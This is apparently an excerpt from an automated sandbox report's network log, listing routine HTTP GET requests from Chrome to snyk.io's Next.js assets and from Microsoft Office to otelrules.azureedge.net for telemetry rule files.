Source: global trafficHTTP traffic detected: GET /_next/static/chunks/framework-945b357d4a851f4b.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-51ef5c3c654b7f9c.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_app-0cbf3048c9ba7463.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9371-f3c21e360213617c.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/2248-53c2c321360bf056.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9384.57f0a60a33b0d128.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5662.de65dddd439a4870.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-1e81cdc3aa31d741.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9253-7607d51456dc87b7.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/index-e37833ce18fb9437.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/Cp4abAN54CGUdTYwS0J62/_buildManifest.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/Cp4abAN54CGUdTYwS0J62/_ssgManifest.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/framework-945b357d4a851f4b.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-51ef5c3c654b7f9c.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9371-f3c21e360213617c.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_app-0cbf3048c9ba7463.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/2248-53c2c321360bf056.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/Cp4abAN54CGUdTYwS0J62/_buildManifest.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/index-e37833ce18fb9437.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/Cp4abAN54CGUdTYwS0J62/_ssgManifest.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9253-7607d51456dc87b7.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US.json HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product.json?slug=product HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/snyk-code.json?slug=product&slug=snyk-code HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/open-source-security-management.json?slug=product&slug=open-source-security-management HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/container-vulnerability-management.json?slug=product&slug=container-vulnerability-management HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/infrastructure-as-code-security.json?slug=product&slug=infrastructure-as-code-security HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/snyk-apprisk.json?slug=product&slug=snyk-apprisk HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/plans.json?slug=plans HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product.json?slug=product HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/platform.json?slug=platform HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/application-security.json?slug=solutions&slug=application-security HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US.json HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/software-supply-chain-security.json?slug=solutions&slug=software-supply-chain-security HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/container-vulnerability-management.json?slug=product&slug=container-vulnerability-management HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/snyk-code.json?slug=product&slug=snyk-code HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/secure-ai-generated-code.json?slug=solutions&slug=secure-ai-generated-code HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/open-source-security-management.json?slug=product&slug=open-source-security-management HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/infrastructure-as-code-security.json?slug=product&slug=infrastructure-as-code-security HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/zero-day-vulnerability-security.json?slug=solutions&slug=zero-day-vulnerability-security HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/platform/security-intelligence.json?slug=platform&slug=security-intelligence HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/snyk-apprisk.json?slug=product&slug=snyk-apprisk HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/platform/deepcode-ai.json?slug=platform&slug=deepcode-ai HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
